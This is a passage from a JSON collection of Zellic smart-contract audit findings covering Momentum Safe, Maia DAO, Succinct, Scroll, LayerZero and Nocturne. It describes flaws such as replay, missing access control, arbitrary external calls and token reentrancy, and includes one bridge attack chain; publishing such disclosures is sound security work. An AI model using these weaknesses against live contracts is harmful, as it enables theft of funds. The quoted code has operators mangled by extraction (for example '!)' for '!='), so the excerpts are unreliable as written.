pk_index: u64, payload: vector, signature: vector, ) acquires Momentum, MomentumSafeEvent { \u2026 \u2026 /) Validate the transaction payload let (tx_sn, cur_sn) = validate_txn_payload(msafe_address, payload); add_to_txn_book(&mut momentum.txn_book, tx_sn, new_tx); Zellic Momentum Safe /) Prune previous transactions with stale sequence number try_prune_pre_txs(&mut momentum.txn_book, cur_sn - 1); \u2026 } This creates an opportunity for max_gas attacks because simple_map:)borrow(\u2026); uses a binary search algorithm, which is O(sqrt(N)). An attacker could stuff the txn_book.pendings to the point where the compute costs of simple_map:)borrow(\u2026) exceed max_gas. This would prevent anyone in the momentum safe from being able to sign pending transactions. Because gas is cheap on Move-Aptos, this attack could potentially be financially fea- sible to a wide range of users. Use a hash map for storing pending safe creations in the PendingMultiSigCreations struct. Similar to the previous finding, Momentum Safe has addressed the griefing attack vec- tor by replacing aptos:)simple_map with aptos:)table in commit 18c8bbf5. We applaud Momentum Safe for their vigalence during the auditing process. They also uncovered a similar griefing attack vector affecting the registry:)OwnerMomentu mSafes data structure. The use of std:)vector for OwnerMomentumSafes.pendings and OwnerMomentumSafes.msafes has been replaced with a custom table_map located in ta ble_map.move. Zellic Momentum Safe 4 Formal Verification The Move prover allows for formal specifications to be written on Move code, which can provide guarantees on function behavior. During the audit period, we provided Momentum Safe with Move prover specifica- tions, a form of formal verification. We found the prover to be highly effective at evaluating the entirety of certain functions\u2019 behavior and recommend the Momentum Safe team to add more specifications to their code base. One of the issues we encountered was that the prover does not support bitwise op- erations yet. The following is a sample of the specifications provided.", + "html_url": "https://github.com/Zellic/publications/blob/master/MSafe - Zellic Audit Report.pdf" + }, + { + "title": "4.1 msafe::creator Ensures the PendingMultisigCreations resource is created upon initialization. spec init_module { ensures exists(signer:)address_of(creator));", + "labels": [ + "Zellic" + ], + "body": "4.1 msafe::creator Ensures the PendingMultisigCreations resource is created upon initialization. spec init_module { ensures exists(signer:)address_of(creator)); }", + "html_url": "https://github.com/Zellic/publications/blob/master/MSafe - Zellic Audit Report.pdf" + }, + { + "title": "4.2 msafe::registry Ensures that the OwnerMomentumSafes resource is created upon register. spec register { ensures exists(signer:)address_of(s));", + "labels": [ + "Zellic" + ], + "body": "4.2 msafe::registry Ensures that the OwnerMomentumSafes resource is created upon register. spec register { ensures exists(signer:)address_of(s)); }", + "html_url": "https://github.com/Zellic/publications/blob/master/MSafe - Zellic Audit Report.pdf" + }, + { + "title": "4.3 msafe::transactions Ensures that the buffer does not overflow. Zellic Momentum Safe spec set_pos_negative { ensures r.offset <) len(r.buffer); } spec set_pos { ensures r.offset <) len(r.buffer); } spec skip { ensures r.offset <) len(r.buffer);", + "labels": [ + "Zellic" + ], + "body": "4.3 msafe::transactions Ensures that the buffer does not overflow. Zellic Momentum Safe spec set_pos_negative { ensures r.offset <) len(r.buffer); } spec set_pos { ensures r.offset <) len(r.buffer); } spec skip { ensures r.offset <) len(r.buffer); }", + "html_url": "https://github.com/Zellic/publications/blob/master/MSafe - Zellic Audit Report.pdf" + }, + { + "title": "4.1 Component: Composable Stable Pool Wrapper Module flow The module is a thin wrapper around the functionality that converts between shares and assets, using the Balancer pool\u2019s stable math logic. The module also gives protec- tion against reentrancy while inside the view context, where state cannot be modified. The state being unmodifiable is accomplished by VaultReentrancyLib.sol, which tries to purposefully trigger the actual reentrancy guard, expecting it to immediately revert when the reentrancy flag is mutated in a (read-only) view context. From the length of the revert data, it is possible to differentiate between a revert due to actual reentrancy or an attempt to modify state in a view context", + "labels": [ + "Zellic" + ], + "body": "4.1 Component: Composable Stable Pool Wrapper Module flow The module is a thin wrapper around the functionality that converts between shares and assets, using the Balancer pool\u2019s stable math logic. The module also gives protec- tion against reentrancy while inside the view context, where state cannot be modified. The state being unmodifiable is accomplished by VaultReentrancyLib.sol, which tries to purposefully trigger the actual reentrancy guard, expecting it to immediately revert when the reentrancy flag is mutated in a (read-only) view context. From the length of the revert data, it is possible to differentiate between a revert due to actual reentrancy or an attempt to modify state in a view context.", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO V2 Ecosystem - Zellic Audit Report.pdf" + }, + { + "title": "4.2 Module: FlywheelBoosterGaugeWeight.sol Function: optIn(ERC20 strategy, FlywheelCore flywheel) 1. Performs the check that userGaugeflywheelId is not already set for msg.sender and corresponds to the strategy and flywheel addresses. 2. Performs the check that the strategy address is trusted gauge. 3. Performs the check that the Flywheel contract was actually deployed over the bribesFactory. 4. Accrues rewards for the msg.sender on a strategy. 5. Increases the whole amount of flywheelStrategyGaugeWeight[strategy][flywh eel] by the current user balance allocated to the strategy. 6. Adds the flywheel address to the array userGaugeFlywheels[msg.sender][strat egy]. Zellic Maia DAO 7. Adds the index of flywheel from userGaugeFlywheels to the userGaugeflywheel Id[msg.sender][strategy][flywheel]. Inputs", + "labels": [ + "Zellic" + ], + "body": "strategy \u2013 Constraints: The address should be a trusted gauge. \u2013 : For this strategy address, the boostedTotalSupply value will be in- creased; further, this value will be used to accumulate global rewards on a strategy. flywheel \u2013 Constraints: The contract should be deployed over the bribesFactory. \u2013 : The contract that manages token rewards. It distributes reward streams across various strategies and distributes them among the users of these strategies. Branches and code coverage (including function calls) Intended branches The userGaugeflywheelId != 0 after the call. 4\u25a1 Test coverage The flywheelStrategyGaugeWeight incremented. \u25a1 Test coverage Negative behavior Double optIn for the same strategy and flywheel. 4\u25a1 Negative test The strategy is not a gauge. 4\u25a1 Negative test The untrusted Flywheel contract. 4\u25a1 Negative test Function call analysis flywheel.accrue(strategy, msg.sender) \u2013 What is controllable? flywheel and strategy. \u2013 If return value controllable, how is it used and how can it go wrong? N/A. \u2013 What happens if it reverts, reenters, or does other unusual control flow? If reverted, the user will not be able to optIn and the user\u2019s balance will not be able to take into account total supply. bHermesGauges(owner()).getUserGaugeWeight(msg.sender, address(strategy)) Zellic Maia DAO \u2013 What is controllable? strategy. \u2013 If return value controllable, how is it used and how can it go wrong? Return the user\u2019s allocated weight to that gauge (strategy). \u2013 What happens if it reverts, reenters, or does other unusual control flow? No problem \u2014 just view function. Function: optOut(ERC20 strategy, FlywheelCore flywheel) 1. Performs the check that the strategy and flywheel addresses were optIn by msg.sender. (b) Accrues rewards for the msg.sender on a strategy. (c) Decreases the whole amount of flywheelStrategyGaugeWeight[strategy] [flywheel] by the current user balance allocated to the strategy. (d) Deletes the flywheel address from userGaugeFlywheels[msg.sender][stra tegy]. (e) Deletes the index of the flywheel address from userGaugeflywheelId[msg. sender][strategy][flywheel]. Inputs strategy \u2013 Constraints: The userFlywheelId should not be zero for the provided stra tegy and flywheel. \u2013 : The strategy address for which the user will optOut, but only after the optIn call. flywheel \u2013 Constraints: The userFlywheelId should not be zero for the provided stra tegy and flywheel. \u2013 : The flywheel address for which the user will optOut, but only after the optIn call. Branches and code coverage (including function calls) Intended branches The userGaugeflywheelId == 0 after the call. 4\u25a1 Test coverage The flywheelStrategyGaugeWeight decremented. \u25a1 Test coverage Negative behavior Zellic Maia DAO msg.sender did not optIn before for strategy and flywheel. 4\u25a1 Negative test msg.sender did not optIn before for strategy. 4\u25a1 Negative test msg.sender did not optIn before for flywheel. 4\u25a1 Negative test The case when length !) userFlywheelId. \u25a1 Negative test Function call analysis flywheel.accrue(strategy, msg.sender) \u2013 What is controllable? flywheel and strategy. \u2013 If return value controllable, how is it used and how can it go wrong? N/A. \u2013 What happens if it reverts, reenters, or does other unusual control flow? If reverted, the user will not be able to optIn and the user\u2019s balance will not be able to take into account total supply. bHermesGauges(owner()).getUserGaugeWeight(msg.sender, address(strategy)) \u2013 What is controllable? strategy. \u2013 If return value controllable, how is it used and how can it go wrong? Return the user\u2019s allocated weight to that gauge (strategy). \u2013 What happens if it reverts, reenters, or does other unusual control flow? No problem \u2014 just view function. Zellic Maia DAO 5 Assessment Results At the time of our assessment, the reviewed code was not deployed to the Ethereum Mainnet. During our assessment on the scoped Maia DAO V2 Ecosystem contracts, we discov- ered one finding, which was of high impact. Maia DAO acknowledged the finding and implemented a fix.", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO V2 Ecosystem - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Missing replay protection on step", + "labels": [ + "Zellic" + ], + "body": "Target: LightClient Category: Coding Mistakes Likelihood: High Severity: High : High One of the methods to update the state of the light client is the step function, which can be called when the light client has an existing sync committee poseidon for the requested finalizedSlot: function step(LightClientStep memory update) external { bool finalized = processStep(update); if (getCurrentSlot() < update.attestedSlot) { revert(\u201cUpdate slot is too far in the future\u201d); } if (finalized) { setHead(update.finalizedSlot, update.finalizedHeaderRoot); setExecutionStateRoot(update.finalizedSlot, update.executionStateRoot); setTimestamp(update.finalizedSlot, block.timestamp); } else { revert(\u201cNot enough participants\u201d); } } If the proof is verified and finalized, the head, execution state root, and timestamp for the slot are all updated: ///)) @notice Sets the current slot for the chain the light client is reflecting. function setHead(uint256 slot, bytes32 root) internal { if (headers[slot] !) bytes32(0) &) headers[slot] !) root) { consistent = false; Zellic Succinct return; } head = slot; headers[slot] = root; emit HeadUpdate(slot, root); } ///)) @notice Sets the execution state root for a given slot. function setExecutionStateRoot(uint256 slot, bytes32 root) internal { if (executionStateRoots[slot] !) bytes32(0) &) executionStateRoots[slot] !) root) { consistent = false; return; } executionStateRoots[slot] = root; } ///)) @notice Sets the sync committee poseidon for a given period. function setSyncCommitteePoseidon(uint256 period, bytes32 poseidon) internal { if ( syncCommitteePoseidons[period] !) bytes32(0) &) syncCommitteePoseidons[period] !) poseidon ) { } consistent = false; return; syncCommitteePoseidons[period] = poseidon; emit SyncCommitteeUpdate(period, poseidon); } function setTimestamp(uint256 slot, uint256 timestamp) internal { timestamps[slot] = timestamp; } The issue is there is no check to ensure the new finalizedSlot is greater than the current head and no check to ensure that a previous call to step is not being replayed. If the same LightClientStep update is used a second time, it will pass all of the checks and roll back the current head to the finalizedSlot from the previous update and set the timestamp for the slot to the current block timestamp. Zellic Succinct As replaying a previous update will cause the timestamp for that slot to be updated, this then prevents it from being used for another five minutes due to the minimum delay: ///)) @notice The minimum delay for using any information from the light client. uint256 public constant MIN_LIGHT_CLIENT_DELAY = 60 * 5; ///)) @notice Checks that the light client delay is adequate. function requireLightClientDelay(uint64 slot, uint32 chainId) internal view { uint256 elapsedTime = block.timestamp - lightClients[chainId].timestamps(slot); require(elapsedTime >) MIN_LIGHT_CLIENT_DELAY, \u201cMust wait longer to use this slot.\u201d); } A malicious user could continually replay an update message to prevent that slot from being used as the requireLightClientDelay would constantly revert. A check should be added to ensure that the head slot is only ever increasing. The issue has been fixed in commit 485c2474. Zellic Succinct", + "html_url": "https://github.com/Zellic/publications/blob/master/Succinct Telepathy - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Frozen state not used on source chain", + "labels": [ + "Zellic" + ], + "body": "Target: SourceAMB Category: Business Logic Likelihood: Low Severity: Low : Medium To send a message to another chain, a user interacts with the SourceAMB contract on the source chain, waits for the corresponding light client to be synchronized on the recipient chain, and then interacts with the TargetAMB contract on the recipient chain. As a safety mechanism, a source chain can be frozen to prevent any messages re- ceived from being executed. The TargetAMB contract uses a frozen mapping to keep track of which chains are frozen. The SourceAMB contract does not use this mapping, despite inheriting the TelepathyStorage contract. For the SourceAMB contract, a sendingEnabled global variable is used as an alterna- tive, which should dictate whether or not the sending component of the messages is enabled. The naming and the states are not, however, consistent with the TargetAMB contract. In case the TargetAMB freezes a SourceAMB chain before the sendingEnabled is set to false on the SourceAMB, the SourceAMB contract will still be able to send messages to the TargetAMB contract even though they cannot be received. This is not a security issue, but it is a potential source of confusion and could lead to unexpected behavior such as assets being locked up on one side of a bridge. We recommend that the SourceAMB contract should also use the frozen mapping to keep track of which chains are frozen, similar to the current implementation of the TargetAMB contract. If not already established, an off-chain rule should also be adhered to that the freezing of a chain must begin from the SourceAMB contract\u2019s side and then spread to the TargetAMB side. This way, the freezing of a chain will be consistent across the SourceAMB and Targe- tAMB sides of the bridge and will be easier to reason about. Zellic Succinct The finding has been acknowledged by Succint. Their official response is reproduced below: We are not going to address this issue, as the freezing is only meant for execution side explicitly. Zellic Succinct", + "html_url": "https://github.com/Zellic/publications/blob/master/Succinct Telepathy - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Arrays\u2019 lengths are not checked", + "labels": [ + "Zellic" + ], + "body": "Target: TelepathyRouter Category: Coding Mistakes Likelihood: Low Severity: Low : Medium The initialize function in the TelepathyRouter contract does not check the length of the sourceChainIds array, which is passed as a parameter. function initialize( uint32[] memory _sourceChainIds, address[] memory _lightClients, address[] memory _broadcasters, address _timelock, address _guardian, bool _sendingEnabled ) external initializer { /) ...)) for (uint32 i = 0; i < sourceChainIds.length; i+)) { lightClients[sourceChainIds[i]] = ILightClient(_lightClients[i]); broadcasters[sourceChainIds[i]] = _broadcasters[i]; frozen[sourceChainIds[i]] = false; } sendingEnabled = _sendingEnabled; version = VERSION; } Due to the fact that the initialize function is called only once, it will likely be thor- oughly tested before being deployed. However, if the _sourceChainIds, _lightClien ts, or _broadcasters arrays mismatch in length, the initialize function will fail and the contract will be left in a noninitialized state, allowing malicious actors that monitor the transaction pool with the possibility of calling the initialize function and taking control of the contract. Zellic Succinct We recommend adding a check to ensure that the length of the _sourceChainIds, _li ghtClients, and _broadcasters arrays are identical. function initialize( uint32[] memory _sourceChainIds, address[] memory _lightClients, address[] memory _broadcasters, address _timelock, address _guardian, bool _sendingEnabled ) external initializer { /) ...)) require(_lightClients.length =) _broadcasters.length); require(_lightClients.length =) _sourceChainIds.length); for (uint32 i = 0; i < sourceChainIds.length; i+)) { lightClients[sourceChainIds[i]] = ILightClient(_lightClients[i]); broadcasters[sourceChainIds[i]] = _broadcasters[i]; frozen[sourceChainIds[i]] = false; } sendingEnabled = _sendingEnabled; version = VERSION; } Additionally, we recommend removing the frozen[sourceChainIds[i]] = false; line, as it is not needed. The frozen mapping is initialized to false by default for all keys. The issue has been fixed in commit 22832db0. Zellic Succinct", + "html_url": "https://github.com/Zellic/publications/blob/master/Succinct Telepathy - Zellic Audit Report.pdf" + }, + { + "title": "3.1 The onlyOwner modifier is missing in the ScrollChain contract", + "labels": [ + "Zellic" + ], + "body": "Target: ScrollChain Category: Business Logic Likelihood: Low Severity: Medium : Medium In the ScrollChain contract, the importGenesisBatch function works as an initializer for the contract. It sets the initial committed batches\u2019 hash and the first finalized state root, which are fundamental for the contract to function properly. Currently, there is no check on whether the function is called by the owner of the contract, which could lead to a malicious actor calling the function first. function importGenesisBatch(bytes calldata _batchHeader, bytes32 _stateRoot) external { /) check genesis batch header length require(_stateRoot !) bytes32(0), \u201dzero state root\u201d); /) check whether the genesis batch is imported require(finalizedStateRoots[0] =) bytes32(0), \u201dGenesis batch imported\u201d); (uint256 memPtr, bytes32 _batchHash) = _loadBatchHeader(_batchHeader); /) check all fields except `dataHash` and `lastBlockHash` are zero unchecked { uint256 sum = BatchHeaderV0Codec.version(memPtr) + BatchHeaderV0Codec.batchIndex(memPtr) + BatchHeaderV0Codec.l1MessagePopped(memPtr) + BatchHeaderV0Codec.totalL1MessagePopped(memPtr); require(sum =) 0, \u201dnot all fields are zero\u201d); } require(BatchHeaderV0Codec.dataHash(memPtr) !) bytes32(0), \u201dzero data hash\u201d); Zellic Scroll Tech require(BatchHeaderV0Codec.parentBatchHash(memPtr) =) bytes32(0), \u201dnonzero parent batch hash\u201d); committedBatches[0] = _batchHash; finalizedStateRoots[0] = _stateRoot; emit CommitBatch(_batchHash); emit FinalizeBatch(_batchHash, _stateRoot, bytes32(0)); } The main implication is that the contract will not function as expected, since both the initial state root and the committed batch can be set to wrong values by the attacker. The Likelihood of this issue is set to Low, however, since the way the contract will theoretically be deployed should not allow for the issue to ever happen. The onlyOwner modifier should be added to the importGenesisBatch function to ensure that only the owner of the contract can call it. Alternatively, any other role can be used, as long as it is ensured that the role is only assigned to a privileged address. Remmediation This issue has been acknowledged by Scroll Tech. Zellic Scroll Tech", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll - 09.27.23 Zellic Audit Report.pdf" + }, + { + "title": "3.2 Addtional checks could be performed", + "labels": [ + "Zellic" + ], + "body": "Target: L2StandardERC20Gateway, L2GasPriceOracle Category: Business Logic Likelihood: Medium Severity: Low : Low Checks are an important part of secure smart contract development. More often than not, they form important invariants that must be maintained for the contract to func- tion properly. Some of the contracts do not perform additional checks on variables or parameters. This could lead to unexpected behavior or even potential vulnerabilities down the development road. In L2StandardERC20Gateway, the first deposit of a new token on a chain typically implies deploying that token. For that, the contract checks whether the extcodesize of the token is greater than zero (i.e., the address is a contract) and deploys the token if it is not, via the _deployL2Token function. function finalizeDepositERC20(...))) external payable override onlyCallByCounterpart nonReentrant { bool _hasMetadata; (_hasMetadata, _data) = abi.decode(_data, (bool, bytes)); bytes memory _deployData; bytes memory _callData; if (_hasMetadata) { (_callData, _deployData) = abi.decode(_data, (bytes, bytes)); } else { require(tokenMapping[_l2Token] =) _l1Token, \u201dtoken mapping mismatch\u201d); _callData = _data; } if (!_l2Token.isContract()) { /) first deposit, update mapping tokenMapping[_l2Token] = _l1Token; _deployL2Token(_deployData, _l1Token); } Zellic Scroll Tech /) ...)) However, the contract does not check whether the _deployData is empty or not (as it does a few lines above via the _hasMetadata variable). This will lead to a revert in the _deployL2Token function, since it will not be able to decode the _deployData empty bytes array. function _deployL2Token(bytes memory _deployData, address _l1Token) internal { address _l2Token = IScrollStandardERC20Factory(tokenFactory).deployL2Token(address(this), _l1Token); (string memory _symbol, string memory _name, uint8 _decimals) = abi.decode( _deployData, (string, string, uint8) ); In L2GasPriceOracle, the setIntrinsicParams function does not perform any checks on any of the parameters: function setIntrinsicParams( uint64 _txGas, uint64 _txGasContractCreation, uint64 _zeroGas, uint64 _nonZeroGas ) public { require(whitelist.isSenderAllowed(msg.sender), \u201dNot whitelisted sender\u201d); intrinsicParams = IntrinsicParams({ txGas: _txGas, txGasContractCreation: _txGasContractCreation, zeroGas: _zeroGas, nonZeroGas: _nonZeroGas }); /) ...)) } Zellic Scroll Tech The impact of this issue is low, since in both presented cases the function will either revert on its own eventually or only allow privileged users to call it. However, main- taining a consistent check pattern is important for the security of the contract as well as ensuring that the contract will not revert unexpectedly. We recommend adding checks to the functions to ensure that the contract will not revert unexpectedly. In the case of L2StandardERC20Gateway, we recommend adding a check on the _dep loyData variable to ensure that it is not empty, right before calling the _deployL2Token function. /) ...)) if (!_l2Token.isContract()) { /) first deposit, update mapping tokenMapping[_l2Token] = _l1Token; require(_deployData.length > 0, \u201ddeploy data is empty\u201d); _deployL2Token(_deployData, _l1Token); } In the case of L2GasPriceOracle, we recommend adding a check on the parameters to ensure that they are not zero or that they are within a certain bound. For example, function setIntrinsicParams( uint64 _txGas, uint64 _txGasContractCreation, uint64 _zeroGas, uint64 _nonZeroGas ) public { require(whitelist.isSenderAllowed(msg.sender), \u201dNot whitelisted sender\u201d); require(_txGas > 0, \u201dtxGas is 0\u201d); require(_txGasContractCreation > _txGas &) _txGasContractCreation > 1e18, \u201dtxGasContractCreation is 0 or less than txGas\u201d); /) ...)) intrinsicParams = IntrinsicParams({ Zellic Scroll Tech txGas: _txGas, txGasContractCreation: _txGasContractCreation, zeroGas: _zeroGas, nonZeroGas: _nonZeroGas }); /) ...)) } This issue has been acknowledged by Scroll Tech and a partial fix, addressing the issue in L2GasPriceOracle, has been implemented in 1437c267. Zellic Scroll Tech", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll - 09.27.23 Zellic Audit Report.pdf" + }, + { + "title": "3.1 Gateways call the Scroll bridge without supplying a fee", + "labels": [ + "Zellic" + ], + "body": "Target: L2ERC721Gateway, L2ERC1155Gateway Category: Business Logic Likelihood: High Severity: Medium : Medium The L2ERC721Gateway and L2ERC1155Gateway contracts perform cross-chain invo- cations by calling the sendMessage function in several different functions. However, these contracts do not send any native value or send an equal amount of native to- kens and specify the amount to be the same. This results in no fee being left for the bridge, causing the call to always revert. An example from L2ERC721Gateway can be found below. function _withdrawERC721( address _token, address _to, uint256 _tokenId, uint256 _gasLimit ) internal nonReentrant { ...)) IL2ScrollMessenger(messenger).sendMessage(counterpart, msg.value, _message, _gasLimit); ...)) } The gateways are not functional, and the cross-chain invocations made by the L2ERC721Gateway and the L2ERC1155Gateway will always fail and revert. Change the business logic to account for the bridge fee. Zellic Scroll This issue has been acknowledged by Scroll, and a fix was implemented in commit 7fb4d1d3. Zellic Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll - 05.26.23 Zellic Audit Report.pdf" + }, + { + "title": "3.2 ERC1155 token minting may fail", + "labels": [ + "Zellic" + ], + "body": "Target: L2ERC1155Gateway Category: Business Logic Likelihood: Medium Severity: Medium : Medium When an ERC1155 token is transferred from L1ERC1155Gateway to the L2ERC1155Gateway, the finalizeDepositERC1155 or finalizeBatchDepositERC1155 functions are called. These, in turn, call the mint or batchMint functions of the underlying ERC1155 contract. A particular detail of both of these functions is the fact that upon minting with mint, a callback is triggered on the destination address. function finalizeDepositERC1155( address _l1Token, address _l2Token, address _from, address _to, uint256 _tokenId, uint256 _amount ) external override nonReentrant onlyCallByCounterpart { IScrollERC1155(_l2Token).mint(_to, _tokenId, _amount, \u201d\u201d); emit FinalizeDepositERC1155(_l1Token, _l2Token, _from, _to, _tokenId, _amount); } Here is the code snippet with the callback from the original ERC1155 contract: function _mint(address to, uint256 id, uint256 amount, bytes memory data) internal virtual { require(to !) address(0), \u201dERC1155: mint to the zero address\u201d); address operator = _msgSender(); uint256[] memory ids = _asSingletonArray(id); uint256[] memory amounts = _asSingletonArray(amount); _beforeTokenTransfer(operator, address(0), to, ids, amounts, data); Zellic Scroll _balances[id][to] += amount; emit TransferSingle(operator, address(0), to, id, amount); _afterTokenTransfer(operator, address(0), to, ids, amounts, data); _doSafeTransferAcceptanceCheck(operator, address(0), to, id, amount, data); } The _doSafeTransferAcceptanceCheck function is responsible for triggering the call- back function onERC1155Received if the _to address is a contract. However, if the con- tract at _to does not implement the IERC721Receiver interface, the onERC1155Received function will not be called, resulting in the failure of the mint function. Should _to be a contract that does not inherit the IERC1155Receiver interface, the m int function will fail, leading to the token not being minted on the L2 side as well as locking the funds on the L1 side. To solve this issue, the protocol will require the manual intervention of the counterpart address to mint the token on the L2 side to another _to address, possibly escalating into a dispute if the funds are not promptly released. We recommend exercising additional caution in this scenario because a reversion could result in the ERC1155 becoming stuck in the L1 gateway. Ideally, in the future, a system should be implemented to check the Merkle tree and recover the ERC1155 if the message fails on L2. This issue has been acknowledged by Scroll. Zellic Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll - 05.26.23 Zellic Audit Report.pdf" + }, + { + "title": "3.3 Arbitrary calldata calls on arbitrary addresses", + "labels": [ + "Zellic" + ], + "body": "Target: L1ScrollMessenger, L2ScrollMessenger, L1ETHGateway, L2ETHGateway Category: Business Logic Likelihood: N/A Severity: Medium : Medium The messenger contracts allow for the relaying of messages from one chain to the other. As currently implemented, they perform a low-level call to an arbitrary address with arbitrary calldata, both supplied as messages over the bridge. This allows for the execution of external calls in the context of the messenger contract, which essentially means that calls are executed on behalf of the messenger contract. function relayMessageWithProof( address _from, address _to, uint256 _value, uint256 _nonce, bytes memory _message, L2MessageProof memory _proof ) external override whenNotPaused onlyWhitelistedSender(msg.sender) { /) ...)) /) @todo check more `_to` address to avoid attack. require(_to !) messageQueue, \u201dForbid to call message queue\u201d); require(_to !) address(this), \u201dForbid to call self\u201d); /) @note This usually will never happen, just in case. require(_from !) xDomainMessageSender, \u201dInvalid message sender\u201d); xDomainMessageSender = _from; (bool success, ) = _to.call{value: _value}(_message); Currently, the _to is checked against the message queue and the messenger contract itself. However, it is not checked against any other contracts, so theoretically it can call any contract\u2019s functions. Similarly, the gateways allow moving native funds from one chain to the other. The same low-level call is used; however, the calldata is currently not passed over the Zellic Scroll bridge. In the future, however, it could be passed over the bridge, allowing for the execution of arbitrary external calls. function finalizeWithdrawETH( address _from, address _to, uint256 _amount, bytes calldata _data ) external payable override onlyCallByCounterpart { /) @note can possible trigger reentrant call to this contract or messenger, /) but it seems not a big problem. /) solhint-disable-next-line avoid-low-level-calls (bool _success, ) = _to.call{value: _amount}(\u201d\u201d); require(_success, \u201dETH transfer failed\u201d); /) @todo farward _data to `_to` in near future. emit FinalizeWithdrawETH(_from, _to, _amount, _data); } Due to the nature of arbitrary calls, it is likely that an attack could directly steal any type of funds (ERC20, ERC721, native, etc.) from the messenger contracts. Moreover, should users give allowance to the messenger contracts, the attacker could also steal any ERC20 tokens that the user has given allowance for, by calling the transferFrom function on the respective ERC20 contracts. At present, there is no immediate security concern for this finding. However, it is worth noting that if data forwarding components are naively implemented then it opens up an avenue for a critical bug, the details follow: In the case of the gateways, an attacker could supply the L2ScrollMessenger itself as the target and supply data using the data forwarding feature such that the L1ETHGateway could be tricked into giving away ETH, as any message could be forged on behalf of the L2ETHGateway and it would be considered legitimate on the L1 side because it came from the appropriate counterpart. The total attack chain would look like this: Zellic Scroll L1EthGateway -> L1ScrollMessenger -> L2ScrollMessenger -> L2EthGateway -> finalizeDepositETH -> _to.call -> L2ScrollMessenger -> L1ScrollMessenger -> L1GatewayETH (Withdraw any amount of ETH) Another consequence of these direct calls is that user errors, such as providing ap- proval incorrectly to the scroll messenger, can be exploited by malicious users. They can make cross-chain calls from one side of the chain to the other, supplying call data to specific smart contracts or tokens, to execute functions like transferFrom. We recommend ensuring that the _to address is a contract and that it implements a custom interface. This way, even if the contract is an arbitrary one, it will need to follow Scroll\u2019s interface, ensuring the context of the call is correct and no arbitrary actions can be performed on behalf of the messenger or gateway contracts. An example of such an interface could be /) SPDX-License-Identifier: MIT pragma solidity ^0.8.0; interface IScrollCallback { ///)) @notice Handle the callback from L1/L2 contracts. ///)) @param to The address of recipient's account on L1/L2. ///)) @param amount The amount of ETH to be deposited. function handleContractCallback( bytes memory message ) external payable; } The messenger contract would then check that the _to contract implements the in- terface and call it with the message as the argument. function relayMessageWithProof( address _from, address _to, uint256 _value, uint256 _nonce, bytes memory _message, Zellic Scroll L2MessageProof memory _proof ) external override whenNotPaused onlyWhitelistedSender(msg.sender) { /) ...)) /) @todo check more `_to` address to avoid attack. require(_to !) messageQueue, \u201dForbid to call message queue\u201d); require(_to !) address(this), \u201dForbid to call self\u201d); /) @note This usually will never happen, just in case. require(_from !) xDomainMessageSender, \u201dInvalid message sender\u201d); xDomainMessageSender = _from; (bool success, ) = _to.call{value: _value}(_message);` bytes memory payload = abi.encodeWithSelector( IScrollCallback.handleContractCallback.selector, _message ); (bool success, ) = _to.call{value: _value}(payload); } The issue has been acknowledged by Scroll, and a fix was implemented in commit bfe29b41. It\u2019s important to note that neither the L1ScrollMessenger nor the L2Scroll Messenger have been updated with the fix, as the Scroll team is yet to decide on the best way to implement it. Zellic Scroll", + "html_url": "https://github.com/Zellic/publications/blob/master/Scroll - 05.26.23 Zellic Audit Report.pdf" + }, + { + "title": "3.1 Out-of-bounds read from toAddressBytes allows undefined behavior", + "labels": [ + "Zellic" + ], + "body": "Target: OFTCore, ONFT721Core, ONFT1155Core Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The following assembly code may read up to 32 bytes out of bounds of toAddressByt es because the size of toAddressBytes is not checked: address toAddress; assembly { toAddress :) mload(add(toAddressBytes, 20)) } There is no direct security impact of this instance of out-of-bounds read. However, this code pattern allows undefined behavior and is potentially dangerous. In the past, even low-level vulnerabilities have been chained with other bugs to achieve critical security compromises. The size of a uint is 32 bytes. So, the branch that uses the MLOAD instruction should require that the size of toAddressBytes is greater than or equal to the read size of 32 bytes. TBD Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Solidity Examples - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Attacker-deployed ERC-20s cause reentrancy and unveri- fied deposits", + "labels": [ + "Zellic" + ], + "body": "Target: Handler Category: Business Logic Likelihood: Medium Severity: High : High The deposit-limit feature limits the rate at which ERC-20 tokens can enter and be mixed by Nocturne. Another feature, the screener-signature requirement, allows Nocturne to identify the owner of funds entering the protocol in order to ensure legal compliance. One way that funds can enter Nocturne without being subject to the deposit limit or the screener-signature requirement is in the form of refund notes. At any time, the owner of previously deposited notes can issue an operation that unwraps the notes, does a series of actions (whitelisted external calls) with them, and then any assets resulting from those calls are rewrapped into new notes. The example use case for this feature is to enable Uniswap swaps of hidden assets. Nocturne takes many steps to prevent these actions from introducing new value into the protocol or introducing any reentrancy hazards, including ensuring that the tracked assets have zero balances before running the actions, requiring the top-level bundle submission call to be made from an EOA, and strictly whitelisting the calls an ac- tion can be. In the version of the configuration we audited, the only swap methods whitelisted were Uniswap\u2019s swapExactInput and swapExactInputSingle. However, a check that was missed is the tokens specified in the Uniswap swap path, including the tokenIn and path parameters. If the tokenIn parameter or any token in the path parameter is an attacker-deployed ERC-20, Uniswap will call ERC20.transfer on that token, which means the attacker can execute arbitrary code in the middle of the action. An attacker can cause arbitrary calls to be done in the middle of an action through an attacker-deployed ERC-20 token\u2019s ERC20.transfer function called by Uniswap during a swap. Zellic Nocturne These arbitrary calls can transfer funds into the Handler, which bypasses deposit limits and screener checks; reenter Nocturne functions not gated by a reentrancy guard; and execute attacks on other protocols in order to immediately deposit the proceeds from such exploitation into Nocturne. The Handler must ensure that all tokens Uniswap calls transfer on are legitimate to- kens, tokens that do not cause attacker-specified behavior when called. For exactInputSingle, this means checking the tokenIn and tokenOut parameters, and for exactInput, this means deserializing the path parameter and checking each token in it. This issue is difficult to remediate because many tokens would need to be whitelisted for the purpose of being on a Uniswap path. (This could be a separate, more lax whitelist than the whitelist of tokens that Nocturne is willing to store.) If the best ex- ecution price for a swap that a nonmalicious user wishes to execute has a path that contains a token that is not on the whitelist, that user will have to get a suboptimal execution price for the swap. This issue has been acknowledged by Nocturne, and a fix was implemented in 